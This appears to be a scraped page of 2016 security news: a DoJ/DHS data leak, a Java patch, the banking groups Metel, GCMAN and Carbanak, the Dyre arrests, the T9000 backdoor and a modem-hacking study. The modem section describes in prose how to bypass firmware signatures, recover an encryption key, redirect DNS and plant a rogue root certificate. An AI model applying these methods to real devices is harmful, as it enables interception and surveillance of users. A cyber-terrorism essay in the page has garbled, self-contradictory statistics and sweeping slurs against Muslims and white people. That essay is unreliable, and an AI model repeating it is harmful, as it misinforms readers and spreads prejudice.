How the Hacker did it?
The hacker claimed to have compromised US Department of Justice (DoJ) email account and gained access to the department's Intranet. Then he allegedly downloaded the information of over 20,000 FBI officers, roughly 9,000 DHS employees and an undisclosed number of DoJ staffers.
The hacker also claimed to have some military emails and credit card numbers belonging to federal employees but provided neither proof nor indication that he intended to release them too.
In October, a teenage hacker who goes by "Cracka" carried out a similar hack and targeted several high-profile government employees, including the CIA director John Brennan, the US spy chief James Clapper, the FBI Deputy Director Mark Giuliano, and others.
However, not all hacks are as vast and serious as that of the US Office of Personnel Management (OPM), in which over 21.5 Million government employees were exposed.
DoJ Downplayed the Impact of Hacking
"This unauthorized access is still under investigation; however, there is no indication at this time that there is any breach of sensitive personally identifiable information," a DOJ spokesman said in a statement to the Guardian.
The hacked data posted anonymously on an encrypted Cryptobin website was reviewed by the Guardian, which found that some of the data from the DHS list are outdated, and some listed individuals have not worked for DHS in years.
Others are criticizing the US government for its failure to protect its sensitive data, especially after the embarrassing and damaging OPM hack that exposed personal details on millions of government employees.
Global and Modern Terrorism/Cyber Terrorism
9.2.2016 Hacking
In the following brief I will describe kinetic plot based modern terrorism/Cyber-terrorism and religious affiliations.
Both Jihadist and Non-Jihadist, organized crime associations, data and statistics to show that Radical Muslim Terrorism is the most prominent form in America today.
Modern terrorism and cyberterrorism display the use of violence and threats to intimidate or coerce, normally for political purposes. The state of fear and submission produced by terrorism is known as terrorization. Both are found underlying in espionage, targeted penetrated breaches and kinetic plots. I will outline and compare the plots based on past history.
A brief history according to James Clapper, Director of National Intelligence; in 2011 alone there were over 13,000 reported attacks. This is a 45-year period of data collection, in which 288 plots led to 611 arrests. In 2016, there were a total of 75 people arrested in 43 plots.
From January 2015 to December of 2015 there were 23 plots of Cyber Terrorism reported and 43 people arrested in 189 plots of terrorism with 454 arrests. Out of 44 plots like Boston, where a kinetic plot was tried and successful; Salafist plots totaled 99%, Non-Jihadist- 3% 14 are Jihadist and led to between 900-1,000 active investigations. Out of 35 plots 70% led to arrest. Out of the targets most are Islamic Driven by Terrorist Radicalization noted by James Comey FBI Director.
Here are some results of terrorism related events following 9/11 and the window of opportunity that it created. There were 288 plots following 9/11 and 170 of those were kinetic plots on the homeland. A whopping 59% of these plots led to arrest.
The Islamic extremists plots equaled 90%, 86 were Jihadist and led to 167 investigations. Out of the 167 investigations 8 were successful plots that reached fruition. Out of the 167 investigated, 78 were interdicted, resulting in 37 murders, and 49 injuries. The Islamic state produced 10-11% splinter groups, 5% women, and 7% bad girls.
In regard to Non-Islamic there were 84 plots resulting in 228 investigations. Out of the 228, 25 kinetic plots on the homeland were successful. There were a total of 59 plots interdicted resulting in 77 deaths and 60 injuries caused by crazy white people.
Official ISIS/ISIL terrorism involved 76 plots from 2014-2016. ISIS produced 60% of these and 18 were on US soil. 26 of these attacks produced violence and 26 were kinetic plots. 14% of total attacks were originating from ISIS. One example is Emanuel Luthchman who tried to capture, bomb, and behead Merchants Grill patrons on New Year’s in New York the name of ISIS. In addition, 4 marines were killed in Tennessee by Isis bred Shiite prisoners and 14 were recently slain in the San Bernardino attacks which were insider attacks.
terrorism isis
Global Terrorism is on the rise in greater numbers than US soil, 17 were killed in the Paris attack. 21 Coptic Christians were murdered on the Libyan Coast. In Tunisia, 137 were killed in a Yemen Mosque. In Kuwait, 39 French and Tunisians were killed at a beach resort. Another 27 killed in a Shiite Mosques and many others remain unreported.
On US Soil, 4 marines were killed in Tennessee, In Akron, OH Terrence Joseph McNeil plots to kill100 US service Members, a terrorist stabbed 5 in Mencer, CA.
In the Federal Spectrum, Government contracts and private sector breach is on the rise. Economic espionage has increased at an alarming rate from 1945-2010. There were 200 arrest were made, 90 in Washington DC Metro area, 40% New York State. Much of these attacks resulted in economic loss from the Chinese. There were 4 confirmed plots in California in 2015. Internationally there were 3 major plots, resulting in a total of 9 indictments which were focused on technology transfer in Government Trade Secrets focused on Corporate Espionage.
This is becoming more and more of the normal trend, instead of the old fashioned classic terrorism through traditional bombings. This modern day terrorism is focused on intellectual theft, theft of personally identifiable information that could lead to easy coercing and manipulation of the person in control of the property. It is focused on theft of trade secrets from the inside out; corporate cyber espionage.
Insider attack history includes the terrorist attacks on London in 2005 which came from their own British Citizens. The Boston Marathon attack was carried out by US citizens and the Paris attacks by French Citizens.
US Cyber Command Commander Admiral Mike Rogers noted that the breach of 22 million records from OPM was simply a part of China’s huge data spying ring from Beijing. The records collected were of those with extensive background checks related to (TSSCI) Top Secret Compartmented Information security clearances. This data will likely lead to identification of spies in China and interruption of their activities.
Big Data Analytics made it possible for large bulk data stolen to be scanned for vital information such as Personally Identifiable Information. PII consists of health, medical, dental, birth, marriage, and or death records leading to next of kin or blood relative threat or coercement.
The pertinent PII; Social Security numbers, mother’s maiden name and or health records can be used and tailored for an intelligence perspective and gain pertinent life details about said individuals or for social engineering and manipulation of said data to alter the individual’s original identity and recruited as double agent and or dual spy.
In an attempt to protect the persons identified in the breach, OPM has transferred the personal data on cleared individuals to the Pentagon. They will take over the monitoring and background to create a secure environment for future individual data security. The annual fiscal cost is estimated at $600,000.00.
In contrast, (then and now) with the recent cross over to Cyber Espionage and Global Terrorism manifestation in Going Dark. Some other terms are rogue, and under the radar through hidden applications and data. These new tactics are through apps which can be download through various applications to the cell phone which cannot be traced by government authorities. Espionage related actions totaled 781, over a span of 20 years in which 565 or 21% Russian and 155 cases confirmed China Based Espionage with many diverted cases through proxy hopping.
The Government cannot gain access to the encrypted communications in applications such as WhatsApp, Snap Chat, Confide, and Signal, just to name a few. The latest encryption methods disappear in a matter of seconds after the message is displayed preventing duplication of said message.
Some popular platforms are gaming platforms which can be used to send encrypted messages under false names. These are used to send and receive plots and plans for attacks. Some other targets through Cyber espionage and hacking are to gain access to PII, Personally Identifiable Information through social media, Twitter, LinkedIn, Face Book, and Dark Mafia, to gather intelligence and or compromise personal data.
In comparison, modern terrorism and cyber terrorism has manifest itself primarily through Islamic radical terrorism in various forms. It comes in many names and under various headings. The primary target is to kill the infidel: (anyone not bowing to the name of Allah). Often times the youth and the weak are recruited as targets for ISIS and ISIL because of their desire to fit in and a need to be a part of something. They are targeted to convert to Islam and radicalized via the internet.
In summary, Terrorism and modern Cyber Terrorism will not go away. This is history repeating itself. Just as many years ago Protestants fought against Catholics, now Christianity fights Muslim. In 2014, 2.6% of terrorism victims lived in Western Countries. This is likely to get worse before it gets better. There is not one easy way to combat terrorism as you see it comes in now in your hand-set, head-set, at your finger-tips. Be wise with your choices as it may come knocking at your door.
CVE-2016-0603 – Oracle Issues out-of-box Java emergency patch for Windows
8.2.2016 Vulnerebility
Oracle issued an out-of-box emergency patch for Java platform running on Windows machines that fixes the critical vulnerability coded as CVE-2016-0603.
Oracle issued an out-of-box emergency patch for Java software running on Windows systems that fixes a critical vulnerability coded as CVE-2016-0603. The vulnerability could be exploited by an attacker to trick users into visiting a malicious website and downloading files on the target system before installing Java 6, 7 or 8.
Oracle hasn’t provided much information on the vulnerability, the flaw has received a CVSS Base Score of 7.6.
“Oracle just released Security Alert CVE-2016-0603 to address a vulnerability that can be exploited when installing Java 6, 7 or 8 on the Windows platform. This vulnerability has received a CVSS Base Score of 7.6.” states the security advisory published by Oracle. “To be successfully exploited, this vulnerability requires that an unsuspecting user be tricked into visiting a malicious web site and download files to the user’s system before installing Java 6, 7 or 8. Though considered relatively complex to exploit, this vulnerability may result, if successfully exploited, in a complete compromise of the unsuspecting user’s system.
As explained by Oracle, the successful exploitation of the CVE-2016-0603 flaw could result in “complete compromise” of the target machine.
The user is exposed to the attack only during the Java installation phase, for this reason, they have no need to upgrade existing Java installation, but that take care if are managing old version of Java prior to 6u113, 7u97 or 8u73 and are installing them. In this last scenario, they have to download the latest Java releases 6u113, 7u97 or 8u73 or later.
Below the list of affected product releases:
“Because the exposure exists only during the installation process, users need not upgrade existing Java installations to address the vulnerability. However, Java users who have downloaded any old version of Java prior to 6u113, 7u97 or 8u73, should discard these old downloads and replace them with 6u113, 7u97 or 8u73 or later.” continues the post.
Oracle recommends users to ensure that they are running the most recent version of Java SE and that all older releases of the software have been completely removed. Oracle further advises against downloading Java from sites other than Java.com as these sites may be malicious.
Another suggestion is to download Java software only from the official Java.com website to avoid ugly surprises.
APT-style bank robberies increase with Metel, GCMAN and Carbanak 2.0 attacks
8.2.2016 Zdroj: Kaspersky APT
In late 2014, Kaspersky Lab researchers made a worrying prediction: financially-motivated cyber-criminals would adopt sophisticated tactics and techniques from APT groups for use in bank robberies.
Just a few months later, in February 2015, we announced the discovery of Carbanak, a cyber-criminal gang that used custom malware and APT techniques to steal millions of dollars while infecting hundreds of financial institutions in at least 30 countries.
Since then, we have seen an increase in these covert, APT-style attacks that combine the use of reconnaissance, social engineering, specialized malware, lateral movement tools and long-term persistence to steal money from financial institutions (particularly ATMs and money transfer systems).
In summer 2015, a #bank in #Russia lost millions of rubles in a one night #bankingAPT #TheSAS2016
Tweet
Today at the Security Analyst Summit (SAS 2016), Kaspersky Lab is announcing the discovery of two new gangs engaged in APT-style bank robberies – Metel and GCMAN – and the reemergence of the Carbanak group with new targets in its sights.
In 2015, Kaspersky Lab researchers conducted Incident Response for 29 organizations located in Russia and infected by these three groups.
Due to the active nature of law enforcement investigations and non-disclosure agreements with victim organizations, Kaspersky Lab cannot provide extensive details of the attacks. Kaspersky Lab is releasing crucial Indicators of Compromise (IOC) and other data to help organizations search for traces of these attack groups in their corporate networks (see below).
The story of Metel – ATM balance rollbacks
In summer 2015, a bank in Russia discovered it had lost millions of rubles in a single night through a series of strange financial transactions. The bank’s clients were making withdrawals from ATMs belonging to other banks and were able to cash out huge sums of money while their balances remained untouched. The victim bank didn’t realize this until it tried to recoup the money withdrawn from the other banks’ ATMs.
During our incident response, we discovered the solution to this puzzle: Metel, a modular malware program also known as Corkow.
The malware, used exclusively by the Metel group, infected the bank’s corporate network via e-mail and moved laterally to gain access to the computers within the bank’s IT systems.
Having gained access to the bank operator’s money-processing system, the gang pulled off a clever trick by automating the rollback of ATM transactions. This meant that money could be stolen from ATM machines via debit cards while the balance on the cards remained the same, allowing for multiple transactions at different ATM machines.
Encrypted configuration for Metel malware plugins
Our investigations revealed that the attackers drove around several cities in Russia, stealing money from ATMs belonging to different banks. With the automated rollback in place the money was instantly returned to the account after the cash had been dispensed from the ATM. The group worked exclusively at night, emptying ATM cassettes at several locations.
GCMAN group planted cron script into #bank server, stealing $200/min #bankingAPT #TheSAS2016
Tweet
In all, we discovered Metel in more than 30 financial institutions, but Kaspersky Lab’s incident responders were able to clean the networks before any major damage could be done. It is highly likely that this threat is far more widespread and we urge financial institutions around the world to scan their networks for signs of the Metel malware.
The Metel criminal group is still active. At the moment, we don’t have any information about any victims outside Russia.
GCMAN – penetration testing tools gone bad
A second group, which we call GCMAN because the malware is based on code compiled on the GCC compiler, emerged recently using similar techniques to the Metel Group to infect banking institutions and attempt to transfer money to e-currency services.
The initial infection mechanism is handled by spear-phishing financial institution targets with e-mails carrying a malicious RAR archive to. Upon opening the RAR archive, an executable is started instead of a Microsoft Word document, resulting in infection.
Once inside the network, the GCMAN group uses legitimate and penetration testing tools such as Putty, VNC, and Meterpreter for lateral movement. Our investigation revealed an attack where the group then planted a cron script into bank’s server, sending financial transactions at the rate of $200 per minute. A time-based scheduler was invoking the script every minute to post new transactions directly to upstream payment processing system. This allowed the group to transfer money to multiple e-currency services without these transactions being reported to any system inside the bank.
Decompiled code of GCMAN malware that is responsible for connecting to CnC
In a stroke of luck, the financial institutions discovered the suspicious activity on their network in time to neutralize the threat and cancel the transactions.
One interesting observation is that the real attack happened approximately 18 months before it was discovered. The group used an MS SQL injection in commercial software running on one of bank’s public web services, and about a year and a half later, they came back to cash out. During that time they poked 70 internal hosts, compromised 56 accounts, making their way from 139 attack sources (TOR and compromised home routers).
We discovered that about two months before the incident someone was trying different passwords for an admin account on a banking server. They were really persistent but doing it only three times a week and then only on Saturdays, in an effort to stay under the radar.
Kaspersky Lab’s research team responded to three financial institutions in Russia that were infected with the GCMAN malware. It is likely that this threat is far more widespread and we urge banks to sweep their networks for signs of this cyber-criminal group.
Carbanak 2.0: new targets beyond banks
After our exposure of the Carbanak group exactly a year ago, the group disappeared for about five months, leading us to believe that the operation was disbanded. However, in September last year, our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers.
In December 2015, we confirmed that the group was still active. Kaspersky Lab discovered signs of Carbanak in two institutions – a telecommunications company and a financial institution.
Executable files founded in SHIM during Carbanak incident response
One interesting characteristic of Carbanak 2.0 is a different victim profile. The group has moved beyond banks and is now targeting the budgeting and accounting departments in any organization of interest to them, using the same APT-style tools and techniques.
In one remarkable case, the Carbanak 2.0 gang used its access to a financial institution that stores information about shareholders to change the ownership details of a large company. The information was modified to name a money mule as a shareholder of the company, displaying their IDs. It’s unclear how they wanted to make use of this information in future.
#Carbanak gang is now targeting budgeting & accounting departments #bankingAPT #TheSAS2016
Tweet
Kaspersky Lab products successfully detect and block the malware used by the Carbanak 2.0, Metel and GCMAN threat actors with the following detection names:
Trojan-Dropper.Win32.Metel
Backdoor.Win32.Metel
Trojan-Banker.Win32.Metel
Backdoor.Win32.GCMan
Backdoor.Win64.GCMan
Trojan-Downloader.Win32.GCMan
Trojan-Downloader.Win32.Carbanak
Backdoor.Win32.Carbanak
Kaspersky Lab urges all organizations to carefully scan their networks for the presence of Carbanak, Metel and GCMAN and, if detected, to disinfect their systems/computers/networks and report the intrusion to law enforcement.
All this information has been made available to customers of our APT intelligence reporting service and they received the indicators of compromise and context information as soon as they became available.
Oracle Issues Emergency Java Update for Windows
8.2.2016 Vulnerebility
The US-based software maker Oracle delivered an unusual out-of-box emergency patch for Java in an effort to fix a during-installation flaw on the Windows platforms.
The successful exploitation of the critical vulnerability, assigned CVE-2016-0603, could allow an attacker to trick an unsuspecting user into visiting a malicious website and downloading files to the victim's system before installing Java 6, 7 or 8.
Although the vulnerability is considered relatively complex to exploit, a successful attack results in "complete compromise" of the target's machine.
What You Need to Know About the Java Exploit
The successful attack requires an attacker to trick a suitably unskilled user for opening a Java release even though the user is nowhere near the Java Website.
Since the existence of the loophole is only during the installation process, users are not required to upgrade their existing Java installations in order to address the vulnerability.
"However, Java users who have downloaded any old version of Java before 6u113, 7u97 or 8u73, should discard these old downloads and replace them with 6u113, 7u97 or 8u73 or later," says Eric Maurice, Oracle security blogger.
Patch Now! Java Update Released
Not much details about the flaw have been known yet, neither Oracle has provided any public information on the nature of the vulnerability.
However, due to the threat posed by a successful attack, we strongly recommend customers to apply the emergency patch as soon as possible.
Hackers behind Dyre Malware Busted in Police Raid
8.2.2016 Virus
The world's most notorious financial hacking operation disrupted by Russian authorities in November, when they raided the offices associated with a Moscow-based film and production company named 25th Floor.
According to the Russian authorities, 25th Floor was allegedly involved in distributing the notorious password-stealing malware known as Dyre Banking Trojan.
Malware Costs Hundreds of $$$ Millions in Losses
The Dyre banking Trojan was typically distributed via spam campaigns and was responsible for over hundreds of millions of dollars in losses at banking and financial institutions, including Bank of America Corp, PayPal, and JPMorgan Chase & Co.
Dyre, also known as Dyreza, first appeared in July 2014 and updated to target Windows 10 systems and its newest Edge browser.
However, Dyre has not been in use since the November raid, according to cyber security experts, who said the raid represents Russia's biggest effort up to date in cracking down on cyber crime.
It is yet not known whether the Russian authorities anyone has arrested or charged anyone linked to the raid.
However, the sources familiar with the matter told Reuters that the Dyre investigation was aided by security firm Kaspersky Lab that would reveal details about the case at its annual conference for security experts starting Sunday.
The malware authors used a variety of techniques to deliver Dyre malware onto victim's web browser in an effort to alter the communication between customers and over 400 financial institutions.
They Producing Cyber-Crime Thriller Movie — BOTNET
The name came out from the November raid: 25th Floor that distributes movies and Television shows in Russia and other East European and near-east countries.
The company is currently busy in the production of a film called BOTNET – a cyber crime thriller based on a 2010 case in which 37 people from the United States and other countries were charged for a $3 Million scam.
25th Floor hired Moscow-based computer security company Group-IB to advise the Botnet director and writers on the detailed aspects of cybercrime, said Group-IB CEO Ilya Sachkov. He said he was initially approached by Nikolay Volchkov, the CEO of 25th Floor.
Then Sachkov got an urgent call from Volchkov last November, saying he needed to meet.
"He was afraid. His color was totally white," added Sachkov. "He knows there's an ongoing investigation about cybercrime."
To know how the Dyre banking malware works and how you can protect yourself against the malware, you can read this The Hacker News article.
Breaking — India Bans Facebook's Free Basics Service
8.2.2016 Social Site
Facebook's Free Basics Internet service has been Blocked in India.
The Telecom Regulatory Authority of India (TRAI) has banned mobile carriers and broadband providers to charge customers based on what services or content they access over the Internet.
Under Prohibition of Discriminatory Tariffs for Data Services Regulations, 2016, "no service provider shall offer or charge discriminatory tariffs for data services on the basis of content."
With this, Facebook's Free Basics is dead in India.
All Zero-Rated Internet Services are BLOCKED!
It is not just Facebook's Free Basics Internet program that has been blocked inside the country, but also the zero-rated internet services altogether.
Zero-rated internet services means those services that allow people access to some websites and web services without utilizing any of their mobile data allowance. Under the new regulation, no such services are now allowed.
Free Basics (previously known by Internet.org) is a Facebook's service that offers people access to more than three dozen Web services hosted on its platform at free of cost.
Subscribers of Free Basics app must have a Reliance mobile network on their phone and are limited to a range of portals including Wikipedia, BBC News, AccuWeather, Bing, and various health websites, and of course, Facebook and Facebook Messenger.
Free Basics Vs. Net Neutrality
Since its launch, Free Basics has been a controversial subject in the country and violated Net Neutrality principles.
Net Neutrality advocates argued that by offering some websites and services for free, people are discouraged from visiting other sites. Facebook's Free Basics offers a huge advantage to the sites and services it includes.
For example, if the Free Basics includes Facebook Messenger to access for free, any other instant messaging app wouldn't be able to upsurge in this competitive market, and this is nothing but the violation of Net Neutrality.
The Telecom regulator had previously ordered Reliance Communications to temporary suspend Free Basics until the regulatory had come to a decision regarding the implementation of rules on differential data tariffs.
Facebook has been contacted for comment on the new regulation in India, which is the second populous country in the world. We'll update this article when we hear Facebook's response.
Hackers leaked DHS staff records, 200GB of files are in their hands
8.2.2016 Hacking
A hacker accessed an employee’s email account at the Department of Justice and stole 200GB of files including records of 9,000 DHS staffers and 20,000 FBI employees.
Yesterday, the data related a Department of Homeland Security (DHS) staff directory were leaked online, a Twitter account shared the link to an archive containing 9,355 names.
The responsible for the data leakage first contacted Motherboard to share the precious archive.
Each record of the DHS Staff Directory includes name, title, email address, and phone number.
Going deep in the archive it is possible to note that it includes information of DHS security specialists, program analysts, InfoSec and IT and also 100 employees with a title “Intelligence”.
The same Twitter account has announced later the imminent release of an additional data dump containing 20,000 FBI employees.
DHS firewall
Are the records authentic?
Motherboard that obtained the archive reached the operations center of the FBI, and in one case the individual who pick up the phone presented himself with the same name associated with that number in the archive. A similar circumstance occurred with a DHS employee, Motherboard so confirmed that the information is legit.
Which is the source of data?
According to Motherboard, a hacker accessed an employee’s email account at the Department of Justice. As proof, the hacker sent the email message to Motherboard’s contributor Joseph Cox directly from the compromised account.
“A hacker, who wishes to remain anonymous, plans to dump the apparent names, job titles, email addresses and phone numbers of over 20,000 supposed Federal Bureau of Investigation (FBI) employees, as well as over 9,000 alleged Department of Homeland Security (DHS) employees, Motherboard has learned.” wrote Cox in a blog post.
“The hacker also claims to have downloaded hundreds of gigabytes of data from a Department of Justice (DOJ) computer, although that data has not been published.”
The hacker first tried to use the compromised credentials to access a DOJ staff portal, but without success, then he called the department directly and obtained the access through social engineering techniques.
The hacker accessed the DoJ intranet where the database is hosted, then he downloaded around the, out of 1TB that he had access to.
“I HAD access to it, I couldn’t take all of the 1TB,” the hacker told to MotherBoard.
The hackers confirmed his intention to release the rest of the data in the near future.Which is the motivation behind the attack?
It is not clear at the moment why the hacker released the archive, surely it’s not financially motivated. The hacker only left the following message when has leaked the data-
“This is for Palestine, Ramallah, West Bank, Gaza, This is for the child that is searching for an answer…” which are the verses of “Long Live Palestine”
The only certainty right now is that similar incidents are becoming too frequent, apparently the government staff is not properly trained on the main cyber threats or the hacking technique. Similar incidents show the lack of knowledge on the most basic security measures.
Whenever a hacker leaks so sensitive data, I think the number of his peers who had access to the same information with the intent to use them in other attacks or resell them, perhaps to a foreign government.
T9000 backdoor, a sophisticated malware that spies on Skype users
8.2.2016 Virus
The T9000 backdoor discovered by PaloAlto Networks is able to infect victims’ machines to steal files, take screengrabs, and records Skype conversations.
A new threat is targeting Skype users, it is a backdoor trojan dubbed T9000 that is able to infect a victim’s machine to steal files, take screengrabs, and record conversations. The T9000 backdoor was spotted by researchers at Palo Alto Networks, it appears as a hybrid variant of another malware dubbed T5000 that was detected in the wild two years ago.
“In addition to the basic functionality all backdoors provide, T9000 allows the attacker to capture encrypted data, take screenshots of specific applications and specifically target Skype users. The malware goes to great lengths to identify a total of 24 potential security products that may be running on a system and customizes its installation mechanism to specifically evade those that are installed.” states a blog post published by PaloAlto Networks.
The T9000 was used by threat actors to targets organizations worldwide, the researchers observed it used in multiple targeted attacks against US organizations.
The backdoor uses a multistage execution flow, which starts when victims opens an RTF file that contained exploits for specific vulnerabilities (i.e. both CVE-2012-1856 and CVE-2015-1641).
It checks before for the presence of defense solutions and malware analysis tools including Sophos, INCAInternet, DoctorWeb, Baidu, Comodo, TrustPortAntivirus, GData, AVG, BitDefender, VirusChaser, McAfee, Panda, Trend Micro, Kingsoft, Norton, Micropoint, Filseclab, AhnLab, JiangMin, Tencent, Avira, Kaspersky, Rising, and Qihoo 360.
At first stage of the infection the T9000 backdoor collects information on the target system and sends it to the C&C server, then the control infrastructure sends specific command to the bot based on the characteristic of the infected machine.
The researchers at Palo Alto Networks have identified three main plugins in the T9000 backdoor:
tyeu.dat
vnkd.dat
qhnj.dat
tyeu.dat is the component that implemented the features to spy on Skype conversations, when hooking into the Skype API, the victim is presented with the message “explorer.exe wants to use Skype.” Theis Skype module can record both audio and video conversations, spy on text chats and take regular screenshots of video calls.
The vnkd.dat component is loaded to steal files on the infected computer, meanwhile the third module qhnj.dat implements backdoor functionalities to control the local file system (i.e. Create/delete/move, encrypt files and directories, and copy the user’s clipboard).
The experts at Palo Alto sustain that the backdoor was developed by skilled professionals due to the evasion technique implemented by the malicious code.
“The author of this backdoor has gone to great lengths to avoid being detected and to evade the scrutiny of the malware analysis community. We hope that sharing the details of how this tool works as well as the indicators in the section below will help others defend themselves against attacks using this tool.”
Critical Vulnerabilities in 3G/4G Modems or how to build Big Brother
8.2.2016 Vulnerebility
This report is the continuation of "#root via SMS", a research made by the SCADA Strangelove team in 2014. It was devoted to telecommunications equipment vulnerabilities with modem flaws only partially covered. This document describes vulnerabilities found and exploited in eight popular 3G and 4G modems available in Russia and worldwide. The findings include Remote Code Execution (RCE) in web scripts, integrity attacks, Cross-Site Request Forgery (CSRF), and Cross-Site Scripting (XSS).
The research covers a full range of attacks against carrier customers using these types of modems — device identification, code injection, PC infection, SIM card cloning, data interception, determining subscriber location, getting access to user accounts on the operator's website, and APT attacks.
Equipment
We analyzed eight modems of the following vendors:
Huawei (two different modems and a router)
Gemtek (a modem and a router)
Quanta (two modems)
ZTE (one modem)
Not all the modems had vulnerabilities in their factory settings; some of them appeared after the firmware was customized by the service provider.
For convenience, let's call all the network equipment — both modems and routers — collectively, "modems".
Statistics on Vulnerable Modems
The data was gathered passively from SecurityLab.ru between 01/29/2015 and 02/05/2015 (one week). Our statistics lacks information about Huawei modems, but it can be easily found at shodan.io:
Vulnerabilities Detected
All the modem models investigated had critical vulnerabilities leading to complete system compromise. Virtually all the vulnerabilities could be exploited remotely (see the "Modems" table). Description of the detected vulnerabilities ranked by severity:
1. RCE (five devices)
All the modem web servers are based on simple CGI scripts that are not properly filtrated (except for Huawei modems, and even then only after a few security updates since the vulnerabilities have been disclosed).
All the modems work with the file system — they need to send AT commands, read and write SMS messages, configure firewall rules, etc.
Almost no devices had CSRF protection, which allowed remote code execution by power of social engineering and remote requests through a malicious website. Some modems were also vulnerable to XSS attacks.
Combined, these three factors produce a disappointing result — more than 60% of the modems are vulnerable to Remote Code Execution. You could get an updated firmware without all found vulns for only Huawei modems (there's a public description of the vulnerabilities). The other vulnerabilities are still considered to be zero-day.
2. Integrity Attacks (six devices)
Only three modems were protected against arbitrary firmware modifications. Two of them had the same integrity check algorithms (asymmetrically encrypted SHA1 with RSA digital signature), and the third one used the RC4 stream cipher for firmware encryption.
All the cryptographic algorithms proved to be vulnerable to attacks violating integrity and confidentiality. In the former case, we can modify the firmware by injecting an arbitrary code. In the latter case, given the weak implementation of the algorithm, we managed to extract the encryption key and determine the encryption algorithm, which also allows firmware modification.
The other three modems had no protection from integrity attacks, but a local access to COM interfaces was required to update the firmware.
The remaining two modems could be updated only though the carrier's network via Firmware Over-The-Air (FOTA) technology.
3. CSRF (five devices)
CSRF attacks can be used for various purposes, but the primary ones are remote upload of modified firmware and successful arbitrary code injection. Using unique tokens for each request is an efficient protection against this type of attacks.
4. XSS (four devices)
The scope of this attack is quite wide — from host infection to SMS interception. However, our research focuses mainly on its prime target — modified firmware upload bypassing AntiCSRF checks and the Same-Origin Policy.
Attack Vectors
1. Identification
First, you need to identify a modem for a successful attack. You can send all kinds of requests to exploit RCE or try to upload various updates via all the possible addresses, but it seems to be inefficient and too signally for a target user. The time of infection — from user detection to code injection, modification of modem settings, etc. — is also quite important in the real (not simulated) conditions.
For this very reason, you need to identify the target device properly. To do that, you must use a simple set of picture addresses, which can tell you the model of the modem. This method helped us to identify all the investigated modems 100%. An example of the code:
2. Code Injection
This stage is described in the previous section, points 1 and 2. The code can be injected either though RCE in web scripts, or though uploading infected firmware. The first method allowed us to penetrate five modems, it isn't that complicated.
Let's describe the vectors of the second method in detail.
Two modems used the same algorithm to protect firmware integrity: the digital signature of SHA1 hash sum by an asymmetric RSA key was carried out via an OpenSSL library. The verification was incorrect: after uploading the firmware (an archive), the web server extracted two main files from it — the one specifying the size of the verified data and the one with the signed hash sum. Next, the verification script obtained a public key from the file system and sent a request to OpenSSL functions to decrypt signature and compare hashsum. If hashsums were the same, the update was installed. The firmware compression algorithm had a feature — you could add additional files with the same names to the archive, but its first bytes wouldn't change. In addition, when we extracted the firmware, the later files overrode the earlier files. This allows changing the firmware without affecting data integrity checks.
The firmware of the third modem was encrypted by the RC4 algorithm with a constant keystream. As there were three different firmware versions on the Internet, you could get several bytes of plain text where there were bytes 0x00 in a file of the unencrypted firmware.
Then, we extracted the ISO image of the modem's virtual CDROM, which allowed us to decipher the first several kilobytes of the each firmware image. They contained the encryption algorithm and address of the encryption key. By XORing the two pieces of firmware, we obtained the plain text of the key itself.
Dmitry Sklyarov, an experienced cryptanalyst and reverse engineer from Positive Technologies, helped us a lot to conduct attacks against cryptographic protocols.
You can use CSRF for remote upload and HTML5 functions for transferring multipart/form-data, or XSS if an application is protected against CSRF (Huawei modem). Only three Huawei modems had this kind of protection, which could be bypassed via XSS, though. In all other cases, an attacker could use the HTML5 code located on a special web page (you can download an example from http://blog.kotowicz.net/2011/04/how-to-upload-arbitrary-file-contents.html).
Gemtek modems required a special utility for firmware updates installed on PC. In this case, firmware was uploaded though host internet connection via HTTP. After that, the firmware integrity was verified by checksums uploaded from the server. We failed to test this scenario.
However, it’s no use hoping that a vendor that doesn't properly check firmware integrity during upload protects it well enough.
3. Data Interception
Now we can execute an arbitrary code on the modem. You need to do three things: determine the modem’s location (later you will understand why) plus be able to intercept SMS messages and HTTP/HTTPS traffic.
The easiest way to determine location is to find the base station identifier (CellID). Then, with the operator’s MCC and MNC at hand, you can determine the victim’s exact location by means of some public bases, such as opencellid.org. Another method is to use the modem’s Wi-Fi card to scan nearby networks and determine the victim’s location area more accurately, given that one base station may have quite a broad coverage. We managed to obtain the CellID of six modems; Wi-Fi was available in two devices. We had to recompile and upload new network card drivers for one of the modems. Its previous driver allowed only the Ad Hoc mode, which prevents scanning nearby APs.
We studied two types of modems: with and without SMS support. The first type also didn’t allow SMS reading though AT commands. The second type allowed SMS reading via XSS. The messages are usually stored in the file system, and it’s not so difficult to get access to them for reading or sending SMS messages and USSD requests.
Traffic interception is more interesting. There are several ways to do that: by changing the modem’s DNS server settings, or replacing the modem’s gateway with the Wi-Fi interface and connecting to an hacker’s access point (that’s why you should know the victim’s location). The first method is simpler: changing the settings is a piece of cake, as they are also stored in the file system. We managed to do that for all but one modem. We studied the second method only in theory — switching the network card mode from ad hoc to active, connecting to an access point, and changing modem routing.
Not only HTTP traffic can be intercepted. By injecting and executing a VBS code on an HTML page, you can add your certificate to the Trusted Root Certification Authorities and successfully conduct MITM attacks:
4. SIM Card Cloning and 2G Traffic Interception
The attacks against SIM card applications were described in detail by Karsten Nohl and in the “#root via SMS” research. We still have to send binary SMS messages to SIM cards, as we failed to make modems send commands to SIM card applications via APDU.
It’s not that bad, though — by injecting an arbitrary code to a modem, you can extend the attack scope by means of binary SMS messages. Firstly, you can now send these messages “to yourself” from the target SIM card via the AT interface by switching the modem to the test mode and working with the COM port. You can do that in the background —the web interface will be available to the victim, who will hardly notice mode changeover. Secondly, you need to exchange data with the COM port via injecting a VBS code to the modem page and executing it with user rights with the help of social engineering.
Switching the modem to the test mode
The PowerShell script for sending a binary SMS message
Using FakeBTS is the next attack vector, and you also need to know the victim’s location for it. Having the victim’s exact location and IMSI at hand, we can use a fake base station nearby and wait until the subscriber connects to us, or we can force a base station (it is possible for five devices). If the operation is successful, we will be able to send binary SMS messages to the target SIM card without any restrictions from the operator.
5. PC Infection
If we penetrate a modem, we have very few attack vectors. However, infecting a PC connected to the modem provides us with many ways to steal and intercept the PC user's data.
You may have already heard of the main infection vector — bad USB. There are also some other methods involving social engineering:
Virtual CDROM. Almost all the modems have a virtual drive image that is enabled for driver installation. You need to replace the image and force its mounting.
VBS, drive-by-download. Code injection to an HTML page, or forced upload of executable files as updates or “diag utilities”.
Browser 0-days. As an example, we used Adobe Flash 0-day found in the archives of Hacking Team.
